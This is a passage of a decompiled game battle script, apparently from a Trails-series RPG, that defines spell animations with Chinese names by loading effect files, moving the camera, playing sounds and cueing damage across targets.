PlayEffect(0xFF, 0xFE, 0x0, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(1800)
Yield()
DamageCue(0xFE)
AS_14(0x0)
FreeEffect(0x0)
Return()
# 结晶防护 end
def Craft_结晶防护复(): pass
label("结晶防护·复")
ResetTarget()
AS_78(1)
LoadEffect(0x1, "battle\\mg082_01.eff")
AS_78(0)
LockCamera(0xFE, 0, 500, 0, 600)
Sleep(600)
Yield()
label("loc_48C1")
ForeachTarget("loc_48EC")
PlayEffect(0xFF, 0xFE, 0x1, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(200)
Yield()
DamageCue(0xFE)
NextTarget()
Jump("loc_48C1")
label("loc_48EC")
AS_14(0x1)
FreeEffect(0x1)
Return()
# 结晶防护·复 end
def Craft_坚韧守护(): pass
label("坚韧守护")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg083_00.eff")
LoadEffect(0x1, "battle\\mg083_01.eff")
AS_78(0)
LockCamera(0xFE, 0, 500, 0, 600)
Sleep(600)
Yield()
PlayEffect(0xFF, 0xFE, 0x0, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(950)
Yield()
label("loc_4958")
ForeachTarget("loc_4981")
PlayEffect(0xFF, 0xFE, 0x1, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(200)
Yield()
NextTarget()
Jump("loc_4958")
label("loc_4981")
Sleep(2600)
Yield()
ResetTarget()
label("loc_4986")
ForeachTarget("loc_4993")
DamageCue(0xFE)
Sleep(200)
Yield()
NextTarget()
Jump("loc_4986")
label("loc_4993")
AS_14(0x0)
AS_14(0x1)
Call("loc_1D5")
Return()
# 坚韧守护 end
def Craft_54_84_499B(): pass
label("Craft_54_84_499B")
Return()
# Craft_54_84_499B end
def Craft_55_85_499C(): pass
label("Craft_55_85_499C")
Return()
# Craft_55_85_499C end
def Craft_56_86_499D(): pass
label("Craft_56_86_499D")
Return()
# Craft_56_86_499D end
def Craft_57_87_499E(): pass
label("Craft_57_87_499E")
Return()
# Craft_57_87_499E end
def Craft_强音之力(): pass
label("强音之力")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg088_00.eff")
AS_78(0)
LockCamera(0xFE, 0, 500, 0, 600)
Sleep(600)
Yield()
SoundEx(197, 0x0)
PlayEffect(0xFF, 0xFE, 0x0, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
AS_14(0x0)
FreeEffect(0x0)
Return()
# 强音之力 end
def Craft_强音之力复(): pass
label("强音之力·复")
ResetTarget()
AS_78(1)
LoadEffect(0x1, "battle\\mg088_00.eff")
AS_78(0)
LockCamera(0xFE, 0, 500, 0, 600)
Sleep(600)
Yield()
label("loc_4A24")
ForeachTarget("loc_4A51")
PlayEffect(0xFF, 0xFE, 0x1, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
SoundEx(197, 0x0)
Sleep(200)
Yield()
NextTarget()
Jump("loc_4A24")
label("loc_4A51")
AS_14(0x1)
FreeEffect(0x1)
Return()
# 强音之力·复 end
def Craft_振奋之激(): pass
label("振奋之激")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg090_00.eff")
LoadEffect(0x1, "battle\\mg090_01.eff")
AS_78(0)
Sleep(200)
Yield()
LockCamera(0xFE, 0, 500, 0, 600)
Sleep(600)
Yield()
SoundEx(201, 0x0)
PlayEffect(0xFF, 0xFE, 0x0, 0x0, 0, 200, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(1350)
Yield()
label("loc_4AC5")
ForeachTarget("loc_4AF2")
PlayEffect(0xFF, 0xFE, 0x1, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, -1)
SoundEx(202, 0x0)
Sleep(200)
Yield()
NextTarget()
Jump("loc_4AC5")
label("loc_4AF2")
Sleep(800)
Yield()
ResetTarget()
label("loc_4AF7")
ForeachTarget("loc_4B04")
DamageCue(0xFE)
Sleep(200)
Yield()
NextTarget()
Jump("loc_4AF7")
label("loc_4B04")
AS_14(0x0)
AS_14(0x1)
Call("loc_1D5")
Return()
# 振奋之激 end
def Craft_5B_91_4B0C(): pass
label("Craft_5B_91_4B0C")
Return()
# Craft_5B_91_4B0C end
def Craft_5C_92_4B0D(): pass
label("Craft_5C_92_4B0D")
Return()
# Craft_5C_92_4B0D end
def Craft_5D_93_4B0E(): pass
label("Craft_5D_93_4B0E")
Return()
# Craft_5D_93_4B0E end
def Craft_5E_94_4B0F(): pass
label("Craft_5E_94_4B0F")
Return()
# Craft_5E_94_4B0F end
def Craft_5F_95_4B10(): pass
label("Craft_5F_95_4B10")
Return()
# Craft_5F_95_4B10 end
def Craft_生命之息(): pass
label("生命之息")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg096_00.eff")
LoadEffect(0x1, "battle\\mg096_01.eff")
AS_78(0)
Sleep(125)
Yield()
LockCamera(0xF8, 0, 0, 0, 600)
Sleep(600)
Yield()
PlayEffect(0xFF, 0xFE, 0x0, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(800)
Yield()
ResetLookingTargetData()
LookingTargetAdd(0xFC, "", 0x0)
LookingTarget(300, 18, 20)
label("loc_4B86")
ForeachTarget("loc_4BB5")
PlayEffect(0xFF, 0xFE, 0x1, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
SoundEx(8, 0x0)
DamageCue(0xFE)
Sleep(250)
Yield()
NextTarget()
Jump("loc_4B86")
label("loc_4BB5")
AS_14(0x0)
AS_14(0x1)
Call("loc_1D5")
Return()
# 生命之息 end
def Craft_圣灵之息(): pass
label("圣灵之息")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg097_00.eff")
LoadEffect(0x1, "battle\\mg097_01.eff")
AS_78(0)
LockCamera(0xF8, 0, 0, 0, 600)
Sleep(600)
Yield()
PlayEffect(0xFF, 0xFE, 0x0, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(1000)
Yield()
ResetLookingTargetData()
LookingTargetAdd(0xFC, "", 0x0)
LookingTarget(500, 18, 20)
label("loc_4C2E")
ForeachTarget("loc_4C5D")
PlayEffect(0xFF, 0xFE, 0x1, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
SoundEx(8, 0x0)
DamageCue(0xFE)
Sleep(250)
Yield()
NextTarget()
Jump("loc_4C2E")
label("loc_4C5D")
Sleep(600)
Yield()
AS_14(0x0)
AS_14(0x1)
Call("loc_1D5")
Return()
# 圣灵之息 end
def Craft_风之精灵(): pass
label("风之精灵")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg098_00.eff")
LoadEffect(0x1, "battle\\mg098_01.eff")
AS_78(0)
LockCamera(0xF4, 0, 1000, 0, 600)
Sleep(600)
Yield()
PlayEffect(0xFF, 0xF2, 0x0, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, 4)
Sleep(500)
Yield()
LockCamera(0xF4, 0, 0, 0, 1500)
Sleep(4000)
Yield()
ResetLookingTargetData()
LookingTargetAdd(0xFC, "", 0x0)
LookingTarget(300, 18, 20)
Sleep(1000)
Yield()
ResetTarget()
label("loc_4CF3")
ForeachTarget("loc_4D22")
PlayEffect(0xFF, 0xFE, 0x1, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
SoundEx(234, 0x0)
Sleep(200)
Yield()
DamageCue(0xFE)
NextTarget()
Jump("loc_4CF3")
label("loc_4D22")
WaitEffect(0xFF, 0x4)
AS_14(0x1)
Call("loc_1D5")
Return()
# 风之精灵 end
def Craft_大治愈术(): pass
label("大治愈术")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg099_00.eff")
LoadEffect(0x1, "battle\\mg099_01.eff")
AS_78(0)
Sleep(200)
Yield()
LockCamera(0xFB, 0, 0, 0, 600)
Sleep(600)
Yield()
PlayEffect(0xFF, 0xFB, 0x0, 0x1, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(1200)
Yield()
ResetLookingTargetData()
LookingTargetAdd(0xFC, "", 0x0)
LookingTarget(300, 18, 20)
ResetTarget()
label("loc_4DA1")
ForeachTarget("loc_4DCA")
PlayEffect(0xFF, 0xFE, 0x1, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(200)
Yield()
NextTarget()
Jump("loc_4DA1")
label("loc_4DCA")
BeginChrThread(0xFF, 3, "loc_15", 0x0)
WaitChrThread(0xFF, 3)
AS_14(0x0)
AS_14(0x1)
Call("loc_1D5")
Return()
# 大治愈术 end
def Craft_精灵之歌(): pass
label("精灵之歌")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg100_00.eff")
LoadEffect(0x1, "battle\\mg100_01.eff")
LoadEffect(0x2, "battle\\mg100_02.eff")
AS_78(0)
Sleep(200)
Yield()
Sleep(600)
Yield()
Fade(0x1, 500, 0x0)
AS_60(0xF7)
SetBrightness(0x0, 0x0, 300)
AS_34()
SetCameraDegree(35, 25, 0, 0)
SetCameraDistance(20000, 0)
LockCamera(0xF3, 0, 0, 0, 0)
PlayEffect(0xFF, 0xF3, 0x0, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, -1)
BlurSwitch(0x12C, 0xBBFFFFFF, 0x0, 0x0, 0x1)
AS_3D(150, 300, 150, 700)
Sleep(500)
Yield()
LockCamera(0xF3, 0, 4000, 0, 2000)
Sleep(1500)
Yield()
SetCameraDegree(-15, 40, 0, 2500)
PlayEffect(0xFF, 0xF3, 0x2, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(2800)
Yield()
Fade(0x1, 500, 0x0)
SetCameraDegree(-100, 25, 0, 0)
SetCameraDistance(20000, 0)
LockCamera(0xF3, 0, 5000, -3000, 0)
SetCameraDegree(20, -20, 0, 2500)
Sleep(300)
Yield()
Sleep(500)
Yield()
LockCamera(0xF3, -2000, 0, -2000, 2000)
SetCameraDistance(30000, 2000)
Sleep(1000)
Yield()
SetBattleSpeed(700)
Sleep(1000)
Yield()
AS_43(0x0, 0x190, 0x0)
Sleep(400)
Yield()
FreeEffect(0x0)
Fade(0x1, 300, 0x0)
SetBattleSpeed(1000)
AS_31(0x17, 0x0)
ResetBrightness(0)
AS_5F(0xF7, 0x1)
ResetLookingTargetData()
LookingTargetAdd(0xFC, "", 0x0)
LookingTarget(0, 25, 30)
ResetTarget()
label("loc_4F5B")
ForeachTarget("loc_4F86")
PlayEffect(0xFF, 0xFE, 0x1, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
DamageCue(0xFE)
Sleep(200)
Yield()
NextTarget()
Jump("loc_4F5B")
label("loc_4F86")
Sleep(2000)
Yield()
CancelBlur(500)
SetBrightness(0x0, 0x1, 0)
AS_14(0x0)
AS_14(0x1)
Call("loc_1D5")
WaitChrThread(0xFF, 3)
AS_8F(0x0)
Fade(0x1, 300, 0x0)
AS_31(0x17, 0x0)
LockCamera(0xF2, 0, 0, 0, 0)
Return()
# 精灵之歌 end
def Craft_65_101_4FBD(): pass
label("Craft_65_101_4FBD")
Return()
# Craft_65_101_4FBD end
def Craft_66_102_4FBE(): pass
label("Craft_66_102_4FBE")
Return()
# Craft_66_102_4FBE end
def Craft_67_103_4FBF(): pass
label("Craft_67_103_4FBF")
Return()
# Craft_67_103_4FBF end
def Craft_时间减速(): pass
label("时间减速")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg104_00.eff")
LoadEffect(0x1, "battle\\mg104_01.eff")
AS_78(0)
LockCamera(0xFE, 0, 500, 0, 600)
Sleep(600)
Yield()
PlayEffect(0xFF, 0xFE, 0x0, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(3300)
Yield()
ResetTarget()
label("loc_5028")
ForeachTarget("loc_5055")
PlayEffect(0xFF, 0xF8, 0x1, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
SoundEx(212, 0x0)
Sleep(200)
Yield()
NextTarget()
Jump("loc_5028")
label("loc_5055")
Sleep(400)
Yield()
ResetTarget()
label("loc_505A")
ForeachTarget("loc_506B")
DamageAnime(0xFE, 0x0, 0x32)
DamageCue(0xFE)
Sleep(200)
Yield()
NextTarget()
Jump("loc_505A")
label("loc_506B")
AS_14(0x0)
AS_14(0x1)
Call("loc_1D5")
Return()
# 时间减速 end
def Craft_时间驱动(): pass
label("时间驱动")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg105_00.eff")
LoadEffect(0x1, "battle\\mg105_01.eff")
AS_78(0)
LockCamera(0xFE, 0, 500, 0, 600)
Sleep(600)
Yield()
PlayEffect(0xFF, 0xFE, 0x0, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(3400)
Yield()
label("loc_50DA")
ForeachTarget("loc_5103")
PlayEffect(0xFF, 0xFE, 0x1, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(200)
Yield()
NextTarget()
Jump("loc_50DA")
label("loc_5103")
Sleep(400)
Yield()
ResetTarget()
label("loc_5108")
ForeachTarget("loc_5115")
DamageCue(0xFE)
Sleep(200)
Yield()
NextTarget()
Jump("loc_5108")
label("loc_5115")
AS_14(0x0)
AS_14(0x1)
Call("loc_1D5")
Return()
# 时间驱动 end
def Craft_灾厄之爪(): pass
label("灾厄之爪")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg106_00.eff")
LoadEffect(0x1, "battle\\mg106_01.eff")
AS_78(0)
Sleep(200)
Yield()
LockCamera(0xF2, 0, 0, 0, 600)
Sleep(600)
Yield()
PlayEffect(0xFF, 0xF2, 0x0, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(800)
Yield()
AS_3D(100, 100, 100, 5000)
Sleep(1600)
Yield()
ResetTarget()
label("loc_5196")
ForeachTarget("loc_51BF")
PlayEffect(0xFF, 0xFE, 0x1, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(200)
Yield()
NextTarget()
Jump("loc_5196")
label("loc_51BF")
Sleep(800)
Yield()
AS_3D(250, 250, 250, 200)
Sleep(900)
Yield()
BeginChrThread(0xFF, 3, "loc_2", 0x0)
AS_14(0x0)
AS_14(0x1)
Call("loc_1D5")
WaitChrThread(0xFF, 3)
Return()
# 灾厄之爪 end
def Craft_6B_107_51E1(): pass
label("Craft_6B_107_51E1")
Return()
# Craft_6B_107_51E1 end
def Craft_6C_108_51E2(): pass
label("Craft_6C_108_51E2")
Return()
# Craft_6C_108_51E2 end
def Craft_6D_109_51E3(): pass
label("Craft_6D_109_51E3")
Return()
# Craft_6D_109_51E3 end
def Craft_6E_110_51E4(): pass
label("Craft_6E_110_51E4")
Return()
# Craft_6E_110_51E4 end
def Craft_6F_111_51E5(): pass
label("Craft_6F_111_51E5")
Return()
# Craft_6F_111_51E5 end
def Craft_魔导祝福(): pass
label("魔导祝福")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg112_00.eff")
LoadEffect(0x1, "battle\\mg112_01.eff")
AS_78(0)
Sleep(200)
Yield()
LockCamera(0xFB, 0, 600, 0, 600)
Sleep(600)
Yield()
PlayEffect(0xFF, 0xFB, 0x0, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, 4)
Sleep(1000)
Yield()
ResetLookingTargetData()
LookingTargetAdd(0xFC, "", 0x0)
LookingTarget(300, 18, 20)
ResetTarget()
label("loc_525C")
ForeachTarget("loc_5289")
PlayEffect(0xFF, 0xFE, 0x1, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
SoundEx(228, 0x0)
Sleep(200)
Yield()
NextTarget()
Jump("loc_525C")
label("loc_5289")
Sleep(1000)
Yield()
BeginChrThread(0xFF, 3, "loc_15", 0x0)
AS_14(0x0)
AS_14(0x1)
Call("loc_1D5")
WaitChrThread(0xFF, 3)
Return()
# 魔导祝福 end
def Craft_A反射屏障(): pass
label("A-反射屏障")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg113_00.eff")
AS_78(0)
Sleep(200)
Yield()
LockCamera(0xFE, 0, 0, 0, 500)
Sleep(400)
Yield()
BeginChrThread(0xFF, 3, "loc_5328", 0x0)
PlayEffect(0xFF, 0xFE, 0x0, 0x8, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, 4)
Sleep(500)
Yield()
Sleep(1200)
Yield()
BlurSwitch(0x64, 0xBBFFFFFF, 0x0, 0x0, 0x1)
Sleep(300)
Yield()
AS_3D(180, 180, 180, 100)
CancelBlur(100)
Sleep(200)
Yield()
DamageCue(0xFE)
WaitChrThread(0xFF, 3)
WaitEffect(0xFF, 0x4)
FreeEffect(0x0)
Return()
label("loc_5328")
SoundEx(173, 0x0)
SoundEx(182, 0x0)
Sleep(2000)
Yield()
SoundEx(190, 0x0)
Return()
# A-反射屏障 end
def Craft_圣灵苏生(): pass
label("圣灵苏生")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg114_00.eff")
LoadEffect(0x1, "battle\\mg114_01.eff")
AS_78(0)
Sleep(200)
Yield()
LockCamera(0xFB, 0, 0, 0, 600)
Sleep(600)
Yield()
PlayEffect(0xFF, 0xFB, 0x0, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, 4)
AS_3D(100, 100, 100, 300)
Sleep(1500)
Yield()
ResetLookingTargetData()
LookingTargetAdd(0xFC, "", 0x0)
LookingTarget(300, 18, 22)
ResetTarget()
label("loc_53B8")
ForeachTarget("loc_53E1")
PlayEffect(0xFF, 0xFE, 0x1, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(800)
Yield()
NextTarget()
Jump("loc_53B8")
label("loc_53E1")
Sleep(2000)
Yield()
ResetTarget()
label("loc_53E6")
ForeachTarget("loc_53F7")
SoundEx(8, 0x0)
DamageCue(0xFE)
Sleep(200)
Yield()
NextTarget()
Jump("loc_53E6")
label("loc_53F7")
AS_14(0x0)
AS_14(0x1)
Call("loc_1D5")
WaitChrThread(0xFF, 3)
Return()
# 圣灵苏生 end
def Craft_纯净弧光(): pass
label("纯净弧光")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg115_00.eff")
LoadEffect(0x1, "battle\\mg115_01.eff")
AS_78(0)
SetBrightness(0x0, 0x0, 1000)
Sleep(250)
Yield()
Fade(0x1, 500, 0x0)
Sleep(200)
Yield()
LockCamera(0xFB, 0, 13000, 0, 0)
AS_B0(0xFFDD, 0x0)
Sleep(800)
Yield()
PlayEffect(0xFF, 0xFB, 0x0, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(1000)
Yield()
Fade(0x1, 750, 0x0)
ResetBrightness(500)
AS_31(0x17, 0x0)
LockCamera(0xFB, 0, 0, 0, 0)
SetCameraDistance(27000, 0)
AS_B0(0x28, 0x5DC)
Sleep(1400)
Yield()
BlurSwitch(0x12C, 0xBBFFFFFF, 0x0, 0x1, 0x3)
AS_3D(200, 200, 200, 1500)
Sleep(2500)
Yield()
CancelBlur(500)
ResetLookingTargetData()
LookingTargetAdd(0xFC, "", 0x0)
LookingTarget(300, 18, 20)
SoundEx(186, 0x0)
ResetTarget()
label("loc_54DD")
ForeachTarget("loc_5506")
PlayEffect(0xFF, 0xFE, 0x1, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(200)
Yield()
NextTarget()
Jump("loc_54DD")
label("loc_5506")
Sleep(100)
Yield()
BeginChrThread(0xFF, 3, "loc_15", 0x0)
SetBrightness(0x0, 0x1, 0)
AS_14(0x0)
AS_14(0x1)
Call("loc_1D5")
WaitChrThread(0xFF, 3)
Return()
# 纯净弧光 end
def Craft_74_116_5520(): pass
label("Craft_74_116_5520")
Return()
# Craft_74_116_5520 end
def Craft_75_117_5521(): pass
label("Craft_75_117_5521")
Return()
# Craft_75_117_5521 end
def Craft_76_118_5522(): pass
label("Craft_76_118_5522")
Return()
# Craft_76_118_5522 end
def Craft_77_119_5523(): pass
label("Craft_77_119_5523")
Return()
# Craft_77_119_5523 end
def Craft_神圣祝福(): pass
label("神圣祝福")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg120_00.eff")
AS_78(0)
Sleep(200)
Yield()
LockCamera(0xFE, 0, 0, 0, 600)
Sleep(600)
Yield()
PlayEffect(0xFF, 0xFE, 0x0, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, 4)
Sleep(1000)
Yield()
DamageCue(0xFE)
WaitEffect(0xFF, 0x4)
FreeEffect(0x0)
Return()
# 神圣祝福 end
def Craft_虚空幻域(): pass
label("虚空幻域")
AS_78(1)
LoadEffect(0x0, "battle\\mg121_00.eff")
AS_78(0)
Sleep(200)
Yield()
LockCamera(0xF4, 0, 0, 0, 600)
Sleep(600)
Yield()
SoundEx(238, 0x0)
ResetTarget()
label("虚空幻域_loop")
ForeachTarget("虚空幻域_loop_end")
PlayEffect(0xFF, 0xFE, 0x0, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, 4)
DamageCue(0xFE)
Yield()
NextTarget()
Jump("虚空幻域_loop")
label("虚空幻域_loop_end")
ResetTarget()
WaitEffect(0xFE, 0x4)
FreeEffect(0x0)
Return()
# 虚空幻域 end
def Craft_狂乱之月(): pass
label("狂乱之月")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg122_00.eff")
LoadEffect(0x1, "battle\\mg122_01.eff")
AS_78(0)
SetBrightness(0x0, 0x0, 1000)
Sleep(350)
Yield()
Fade(0x1, 800, 0x0)
LockCamera(0xFB, 0, 30000, 0, 0)
SetCameraDegree(0, 0, 0, 0)
SetCameraDistance(14000, 0)
PlayEffect(0xFF, 0xFB, 0x0, 0x0, 0, 30000, 0, 0, 0, 0, 1000, 1000, 1000, 4)
BlurSwitch(0x12C, 0xBBFFFFFF, 0x0, 0x0, 0x5)
Sleep(2800)
Yield()
AS_3D(50, 50, 50, 2500)
SetCameraDistance(17000, 2700)
Sleep(2300)
Yield()
AS_43(0x0, 0x320, 0x0)
Sleep(800)
Yield()
Fade(0x1, 300, 0x0)
CancelBlur(500)
AS_31(0x17, 0x0)
LockCamera(0xFB, 0, 0, 0, 0)
ResetBrightness(300)
Sleep(300)
Yield()
ResetTarget()
label("loc_56B5")
ForeachTarget("loc_56E0")
PlayEffect(0xFF, 0xF8, 0x1, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, -1)
DamageCue(0xFE)
Sleep(100)
Yield()
NextTarget()
Jump("loc_56B5")
label("loc_56E0")
Sleep(500)
Yield()
WaitEffect(0xFF, 0x4)
AS_14(0x1)
Call("loc_1D5")
SetBrightness(0x0, 0x1, 0)
Return()
# 狂乱之月 end
def Craft_星之守护(): pass
label("星之守护")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg116_00.eff")
LoadEffect(0x1, "battle\\mg116_01.eff")
AS_78(0)
SetBrightness(0x0, 0x0, 1000)
ResetTarget()
Sleep(400)
Yield()
Fade(0x1, 800, 0x0)
LockCamera(0xFB, 0, 9000, 0, 0)
SetCameraDegree(40, 10, 0, 0)
SetCameraDistance(20000, 0)
AS_60(0xF7)
AS_6D(0x40000)
Sleep(600)
Yield()
SetCameraDegree(0, -30, 0, 2850)
SetCameraDistance(17000, 3000)
PlayEffect(0xFF, 0xFB, 0x0, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, 4)
SoundEx(359, 0x1)
Sleep(2050)
Yield()
SetCameraDistance(29000, 1000)
SoundEx(312, 0x0)
Sleep(850)
Yield()
AS_5F(0xF7, 0x1)
AS_31(0x17, 0x0)
LockCamera(0xFB, 0, 500, 0, 0)
SetCameraDegree(70, 15, 0, 0)
SetCameraDistance(24000, 0)
SoundEx(186, 0x0)
LockCamera(0xFB, 0, 0, 0, 1200)
AS_B0(0x14, 0x4B0)
AS_0B(0x2D, 0xBB8)
Sleep(600)
Yield()
StopSound(359)
ResetTarget()
label("loc_57F2")
ForeachTarget("loc_581B")
PlayEffect(0xFF, 0xFE, 0x1, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(300)
Yield()
NextTarget()
Jump("loc_57F2")
label("loc_581B")
Sleep(1000)
Yield()
ResetBrightness(500)
BeginChrThread(0xFF, 3, "loc_15", 0x0)
AS_14(0x0)
WaitEffect(0xFF, 0x4)
AS_14(0x1)
Call("loc_1D5")
SetBrightness(0x0, 0x1, 0)
Return()
# 星之守护 end
def Craft_情报解析(): pass
label("情报解析")
ResetTarget()
AS_78(1)
LoadEffect(0x1, "battle/mg124_00.eff")
AS_78(0)
ResetLookingTargetData()
LockCamera(0xF8, 0, 0, 0, 1500)
PlayEffect(0xFF, 0xF8, 0x1, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(1500)
Yield()
DamageCue(0xFE)
AS_14(0x1)
Call("loc_1D5")
AS_8D(0x4A, 0x0, 0x0, 0x0, 0x0)
Return()
# 情报解析 end
def Craft_7D_125_58A0(): pass
label("Craft_7D_125_58A0")
Return()
# Craft_7D_125_58A0 end
def Craft_7E_126_58A1(): pass
label("Craft_7E_126_58A1")
Return()
# Craft_7E_126_58A1 end
def Craft_7F_127_58A2(): pass
label("Craft_7F_127_58A2")
Return()
# Craft_7F_127_58A2 end
def Craft_回复术(): pass
label("回复术")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg128_00.eff")
AS_78(0)
Sleep(125)
Yield()
LockCamera(0xF8, 0, 0, 0, 600)
Sleep(600)
Yield()
SoundEx(226, 0x0)
PlayEffect(0xFF, 0xF8, 0x0, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(2000)
Yield()
SoundEx(8, 0x0)
DamageCue(0xFE)
AS_14(0x0)
FreeEffect(0x0)
Return()
# 回复术 end
def Craft_中回复术(): pass
label("中回复术")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg129_00.eff")
AS_78(0)
Sleep(125)
Yield()
LockCamera(0xF8, 0, 0, 0, 600)
Sleep(700)
Yield()
BeginChrThread(0xFF, 3, "loc_5970", 0x0)
PlayEffect(0xFF, 0xF8, 0x0, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(2250)
Yield()
SoundEx(8, 0x0)
DamageCue(0xFE)
WaitChrThread(0xFF, 3)
AS_14(0x0)
FreeEffect(0x0)
Return()
label("loc_5970")
SoundEx(226, 0x0)
Sleep(150)
Yield()
SoundEx(221, 0x0)
Return()
# 中回复术 end
def Craft_大回复术(): pass
label("大回复术")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg130_00.eff")
LoadEffect(0x1, "battle\\mg130_01.eff")
AS_78(0)
LockCamera(0xFE, 0, 0, 0, 600)
Sleep(600)
Yield()
BeginChrThread(0xFF, 3, "loc_5A1D", 0x0)
PlayEffect(0xFF, 0xF8, 0x0, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(1120)
Yield()
PlayEffect(0xFF, 0xF8, 0x1, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(500)
Yield()
SoundEx(8, 0x0)
DamageCue(0xFE)
WaitChrThread(0xFF, 3)
AS_14(0x0)
AS_14(0x1)
Call("loc_1D5")
Return()
label("loc_5A1D")
SoundEx(227, 0x0)
Sleep(400)
Yield()
SoundEx(226, 0x0)
Sleep(700)
Yield()
SoundEx(228, 0x0)
Return()
# 大回复术 end
def Craft_水之幻影(): pass
label("水之幻影")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg131_00.eff")
AS_78(0)
LockCamera(0xFE, 0, 500, 0, 600)
Sleep(600)
Yield()
label("loc_5A61")
ForeachTarget("loc_5A8A")
PlayEffect(0xFF, 0xFE, 0x0, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(200)
Yield()
NextTarget()
Jump("loc_5A61")
label("loc_5A8A")
Sleep(1500)
Yield()
ResetTarget()
label("loc_5A8F")
ForeachTarget("loc_5A9C")
DamageCue(0xFE)
Sleep(200)
Yield()
NextTarget()
Jump("loc_5A8F")
label("loc_5A9C")
AS_14(0x0)
FreeEffect(0x0)
Return()
# 水之幻影 end
def Craft_封魔领域(): pass
label("封魔领域")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg132_00.eff")
LoadEffect(0x1, "battle\\mg132_01.eff")
AS_78(0)
LockCamera(0xFE, 0, 500, 0, 600)
Sleep(600)
Yield()
PlayEffect(0xFF, 0xFE, 0x0, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(1100)
Yield()
label("loc_5B08")
ForeachTarget("loc_5B2D")
PlayEffect(0xFF, 0xFE, 0x1, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, -1)
NextTarget()
Jump("loc_5B08")
label("loc_5B2D")
Sleep(1900)
Yield()
ResetTarget()
label("loc_5B32")
ForeachTarget("loc_5B43")
DamageAnime(0xFE, 0x0, 0x32)
DamageCue(0xFE)
Sleep(200)
Yield()
NextTarget()
Jump("loc_5B32")
label("loc_5B43")
AS_14(0x0)
AS_14(0x1)
Call("loc_1D5")
Return()
# 封魔领域 end
def Craft_中复苏术(): pass
label("中复苏术")
ResetTarget()
AS_78(1)
